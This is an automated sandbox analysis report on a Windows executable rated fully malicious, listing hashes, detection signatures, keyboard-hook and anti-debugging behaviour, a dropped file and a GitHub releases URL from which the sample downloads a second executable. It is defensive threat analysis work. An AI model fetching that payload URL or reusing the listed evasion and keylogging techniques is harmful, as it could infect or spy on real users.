Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.1111.23697.exe

Overview

General Information

Sample name:	SecuriteInfo.com.FileRepMalware.1111.23697.exe
Analysis ID:	1467925
MD5:	d4d645cb0c89359d63a331158cb81eed
SHA1:	d05da1f86a6de7d2fcb6c6e87aa7390ced599b63
SHA256:	5817ef3fabfb94cb2458ef826416d99a14f9633239bd4959b3bf3a6ec4c20731
Tags:	exe
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Contains functionality to register a low level keyboard hook

Creates HTML files with .exe extension (expired dropper behavior)

Detected VMProtect packer

Hides threads from debuggers

Machine Learning detection for sample

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Sample or dropped binary is a compiled AutoHotkey binary

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to evade analysis by execution special instruction (VM detection)

AV process strings found (often used to terminate AV products)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if the current process is being debugged

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to simulate keystroke presses

Detected potential crypto function

Entry point lies outside standard sections

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

OS version to string mapping found (often used in BOTs)

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.FileRepMalware.1111.23697.exe (PID: 6916 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe" MD5: D4D645CB0C89359D63A331158CB81EED)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://github.careers

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe	ReversingLabs: Detection: 79%
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe	Virustotal: Detection: 73%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe

Joe Sandbox ML: detected

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_004757E0 __fassign,FindFirstFileA,FindClose,FindFirstFileA,		0_2_004757E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_0070D95B FindFirstFileA,		0_2_0070D95B

Networking

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

File created: netcomp.exe.0.dr

Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

Code function: 0_2_00452C79 InternetReadFileExA,InternetCloseHandle,

0_2_00452C79

Source: global traffic

HTTP traffic detected: GET /abuzgreksi/456/releases/download/456/123.exe HTTP/1.1User-Agent: AutoHotkeyHost: github.comCache-Control: no-cache

Source: netcomp.exe.0.dr	String found in binary or memory: <a href="https://www.facebook.com/GitHub" class="footer-social-icon d-block Link--outlineOffset" data-analytics-event="{"category":"Footer","action":"go to Facebook","label":"text:text:facebook"}"> equals www.facebook.com (Facebook)
Source: netcomp.exe.0.dr	String found in binary or memory: <a href="https://www.linkedin.com/company/github" class="footer-social-icon d-block Link--outlineOffset" data-analytics-event="{"category":"Footer","action":"go to Linkedin","label":"text:text:linkedin"}"> equals www.linkedin.com (Linkedin)
Source: netcomp.exe.0.dr	String found in binary or memory: <a href="https://www.youtube.com/github" class="footer-social-icon d-block Link--outlineOffset" data-analytics-event="{"category":"Footer","action":"go to YouTube","label":"text:text:youtube"}"> equals www.youtube.com (Youtube)

Source: global traffic

DNS traffic detected: DNS query: github.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Fri, 05 Jul 2024 01:36:13 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin

Source: Amcache.hve.0.dr	String found in binary or memory: http://upx.sf.net
Source: netcomp.exe.0.dr	String found in binary or memory: https://api.github.com/_private/browser/errors
Source: netcomp.exe.0.dr	String found in binary or memory: https://api.github.com/_private/browser/stats
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://autohotkey.com
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://autohotkey.comCould
Source: netcomp.exe.0.dr	String found in binary or memory: https://avatars.githubusercontent.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://cli.github.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://collector.github.com/github/collect
Source: netcomp.exe.0.dr	String found in binary or memory: https://desktop.github.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://docs.github.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://docs.github.com/get-started/accessibility/keyboard-shortcuts
Source: netcomp.exe.0.dr	String found in binary or memory: https://docs.github.com/get-started/exploring-integrations/about-building-integrations
Source: netcomp.exe.0.dr	String found in binary or memory: https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax
Source: netcomp.exe.0.dr	String found in binary or memory: https://docs.github.com/site-policy/github-terms/github-terms-of-service
Source: netcomp.exe.0.dr	String found in binary or memory: https://docs.github.com/site-policy/privacy-policies/github-privacy-statement
Source: netcomp.exe.0.dr	String found in binary or memory: https://github-cloud.s3.amazonaws.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.blog
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.careers
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, netcomp.exe.0.dr	String found in binary or memory: https://github.com/
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/about
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/abuzgreksi/456/releases/download/456/123.exe
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/abuzgreksi/456/releases/download/456/123.exe"
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760146944.0000000001360000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/abuzgreksi/456/releases/download/456/123.exenetcomp.exe?
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/collections
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/customer-stories
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/edu
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/enterprise
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/enterprise/advanced-security
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/enterprise/startups
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/features
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/features/actions
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/features/code-review
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/features/codespaces
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/features/copilot
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/features/discussions
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/features/issues
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/features/packages
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/features/security
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/fluidicon.png
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/github
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/github/roadmap
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/github/site-policy/pull/582
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/mobile
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/notifications/beta/shelf
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/pricing
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/readme
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.00000000013C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/s
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/solutions/ci-cd
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/solutions/devops
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/solutions/devsecops
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/solutions/industries/financial-services
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/solutions/industries/healthcare
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/solutions/industries/manufacturing
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/team
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/topics
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.com/trending
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.community
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_g
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-type
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-4dd22d95
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-fd68b41b03a0.j
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/behaviors-ac844bd01e4d.js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/dark-6b1e37da2254.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-a4629b2e906b.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-f4daad25d8cf.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-1911f0cf0db4.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/element-registry-cebd41dde8aa.js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/environment-a36e9a1c67ad.js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/error-add24e2c1056.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/github-0c7b5281bcc9.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/github-elements-a7dc71cd6e4e.js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/github-mark-57519b92ca4e.png
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/global-526475a50099.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-f6d4ee842c1e.js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/light-efd2f2257c96.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/light_colorblind-afcc3a6a38dd.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-79bca7145393.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/mona-sans-d1bf285e9b9b.woff2
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/notifications-global-ce1721184096.js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/primer-61560ce103d3.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/primer-primitives-8500c2c7ce5f.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/react-lib-a89cbd87a1e0.js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/sessions-599dffba3e8f.js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/site-3ab44dbdb8a0.css
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-cdd1e82b3795.js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-810e4b1b9abd.js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_m
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_session-resume_dist_index_js-node
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-1c
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-cc7cb714ead5.js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-5a335cbe
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-83
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-no
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/assets/wp-runtime-dc42d191447b.js
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/favicons/favicon.png
Source: netcomp.exe.0.dr	String found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
Source: netcomp.exe.0.dr	String found in binary or memory: https://githubstatus.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://partner.github.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://resources.github.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://resources.github.com/devops/tools/compare
Source: netcomp.exe.0.dr	String found in binary or memory: https://resources.github.com/learn/pathways
Source: netcomp.exe.0.dr	String found in binary or memory: https://resources.github.com/newsletter/
Source: netcomp.exe.0.dr	String found in binary or memory: https://services.github.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://shop.github.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://skills.github.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://socialimpact.github.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://support.github.com?tags=dotcom-404
Source: netcomp.exe.0.dr	String found in binary or memory: https://support.github.com?tags=dotcom-footer
Source: netcomp.exe.0.dr	String found in binary or memory: https://twitter.com/githubstatus
Source: netcomp.exe.0.dr	String found in binary or memory: https://user-images.githubusercontent.com/
Source: netcomp.exe.0.dr	String found in binary or memory: https://www.electronjs.org
Source: netcomp.exe.0.dr	String found in binary or memory: https://www.githubstatus.com
Source: netcomp.exe.0.dr	String found in binary or memory: https://www.linkedin.com/company/github
Source: netcomp.exe.0.dr	String found in binary or memory: https://www.tiktok.com/
Source: netcomp.exe.0.dr	String found in binary or memory: https://www.twitch.tv/github
Source: netcomp.exe.0.dr	String found in binary or memory: https://www.youtube.com/github
Source: netcomp.exe.0.dr	String found in binary or memory: https://x.com/github

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

Code function: 0_2_004094F0 SetWindowsHookExA 0000000D,Function_00004DC0,?,00000000

0_2_004094F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

Code function: 0_2_004105E0 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

0_2_004105E0

System Summary

Detected VMProtect packer

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe

Static PE information: .vmp0 and .vmp1 section names

Sample or dropped binary is a compiled AutoHotkey binary

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

Window found: window name: AutoHotkey

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_0040155F	0_2_0040155F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_004080E0	0_2_004080E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_00492080	0_2_00492080
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_004181C0	0_2_004181C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_0045C340	0_2_0045C340
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_00474300	0_2_00474300
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_004083B0	0_2_004083B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_004925D1	0_2_004925D1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_00424610	0_2_00424610
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_00446620	0_2_00446620
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_004586D0	0_2_004586D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_004CC740	0_2_004CC740
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_004147A0	0_2_004147A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_004147B5	0_2_004147B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_00486A60	0_2_00486A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_0048F063	0_2_0048F063
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_0040F65D	0_2_0040F65D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_0049371D	0_2_0049371D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_0049580E	0_2_0049580E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_0041FAF0	0_2_0041FAF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_0041BF10	0_2_0041BF10

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: String function: 00474A60 appears 72 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: String function: 0042FE80 appears 215 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: String function: 0048D210 appears 31 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: String function: 0042FBE0 appears 78 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: String function: 00487ED1 appears 393 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: String function: 004C8508 appears 35 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: String function: 0048828D appears 50 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: String function: 00474AF0 appears 46 times

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.1111.23697.exe
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe	Binary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.1111.23697.exe

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.spyw.evad.winEXE@2/2@1/1

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

File created: C:\Users\user\Desktop\netcomp.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe	ReversingLabs: Detection: 79%
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe	Virustotal: Detection: 73%

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: srvcli.dll	Jump to behavior
